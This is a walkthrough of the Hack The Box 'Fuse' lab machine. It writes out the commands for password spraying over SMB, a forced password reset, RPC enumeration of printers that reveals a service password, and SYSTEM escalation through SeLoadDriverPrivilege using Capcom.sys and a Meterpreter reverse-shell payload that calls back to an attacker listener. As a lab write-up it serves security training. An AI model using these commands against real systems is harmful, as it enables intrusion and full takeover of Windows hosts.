Learn how to successfully complete the Fuse challenge on the Hack The Box platform using RPC information gathering techniques, printer data analysis, and SeLoadDriverPrivilege privilege escalation exploitation.
Solutions to tasks submitted for completion by machines from the HackTheBox platform are published.
The material describes the process of creating a password dictionary based on indirect information about users, analyzing printer data via RPC, and the method of privilege escalation using SeLoadDriverPrivilege.
The machine is assigned the IP address 10.10.10.193, which is added to the /etc/hosts file.
10.10.10.193 fuse.htb
First, we scan open ports.
#!/bin/bash ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) nmap -p$ports -A $1
Add the FQDN of the machine name to /etc/hosts.
10.10.10.193 fuse.fabricorp.local
A web server is running on the host. Let’s see what’s there.
We are greeted by a site with printers, on which four documents are available for download, which should be downloaded for further analysis.
Since no other attack vectors have been identified, it is worth recording the usernames for future reference.
cat *.csv | grep 2020 | cut -d ',' -f 2 | sort | uniq
We will also create a list of passwords from the information in the documents.
cat *.csv | grep 2020 | cut -d ',' -f2,5-7 | tr -d '"' | tr '.' '\n' | tr ',' '\n' | tr -d ' ' | tr '-' '\n' | sort | uniq | tail -n+4
Now it’s worth checking the ability to connect to SMB for further analysis.
cme smb 10.10.10.193 -u users.txt -p pass.txt --continue-on-success
There is a message that the password for the user needs to be changed.
We will set the same password
smbpasswd -r 10.10.10.193 -U bhult
However, the password remains valid for only a few seconds.
Therefore, we execute two commands in a chain.
smbpasswd -r 10.10.10.193 -U bhult ; rpcclient -U bhult 10.10.10.193
We view all users, we will do this using RPC.
And we find an interesting user. Considering all the topics with printers that have been going on all the time, let’s take a look at printers.
We find the password. We create a list of already valid users.
Now let’s try the password for all users.
sudo cme smb 10.10.10.193 -u users.txt -p '$fab@s3Rv1ce$1' --continue-on-success
Two users detected. Successfully connected to WinRM and received the first flag.
Let’s look at the information about the current user.
The SeLoadDriverPrivilege privilege was discovered, which opens a vector for local privilege escalation (LPE). The following software is required to complete this process: Capcom.sys, EoPLoadDriver, and Meterpreter shell. The next step is to create these components.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.160 LPORT=4321 -f exe -o e.exe
Activate the listener. Upload everything to the host and run the meterpreter exploit.
handler -p windows/x64/meterpreter/reverse_tcp -H 10.10.15.160 -P 4321
Now you need to download the driver.
.\eoploaddriver.exe System\CurrentControlSet\custom C:\Users\svc-print\Documents\Capcom.sys
Before running the exploit, you need to make some changes to its code. You need to comment out certain lines in the file:
/usr/share/metasploit-framework/modules/exploits/windows/local/capcom_sys_exec.rb.
We do it:
Successful execution of the exploit resulted in the creation of a new session with SYSTEM privileges, demonstrating what can happen when the SeLoadDriverPrivilege privilege is used to locally elevate privileges.
This article describes the solution to the Fuse challenge on HackTheBox. It covers printer analysis, password dictionary creation, and the use of the SeLoadDriverPrivilege privilege to gain SYSTEM-level access. It shows how such vulnerabilities can be exploited to escalate privileges.